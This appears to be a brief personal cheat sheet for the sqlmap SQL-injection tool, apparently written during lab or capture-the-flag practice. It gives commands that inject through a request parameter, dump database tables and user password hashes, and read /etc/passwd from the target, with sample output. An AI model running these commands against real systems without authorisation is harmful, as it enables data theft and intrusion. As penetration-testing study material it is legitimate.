# SQLmap cheatsheet

# Post requests

In burpsuite intercept post request and save to a file

sqlmap -r req -p "uname"

-r file that contains your request -p paramater you want to fuzz

# Dumping tables

sqlmap -r req -dbms=mysql -tables --dump -p uname

Database: writer
[3 tables]
+---------+
| site    |
| stories |
| users   |
+---------+

sqlmap -r req -dbms=mysql -D writer -T users --dump
Database: writer
Table: users
+----+------------------+--------+----------------------------------+----------+--------------+
| id | email            | status | password                         | username | date_created |
+----+------------------+--------+----------------------------------+----------+--------------+
| 1  | admin@example.co | Active | 118e48794631a9612484ca8b55f622d0 | admin    | NULL         |
+----+------------------+--------+----------------------------------+----------+--------------+

sqlmap -r req -dbms=mysql -tables --dump -p searchitem -D db -T users -C username,pwd --dump
+----------+------------------------------------------------------------------+
| username | pwd                                                              |
+----------+------------------------------------------------------------------+
| agent47  | ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 |
+----------+------------------------------------------------------------------+

# reading files

sqlmap -r req --file-read=/etc/passwd -p "uname" --batch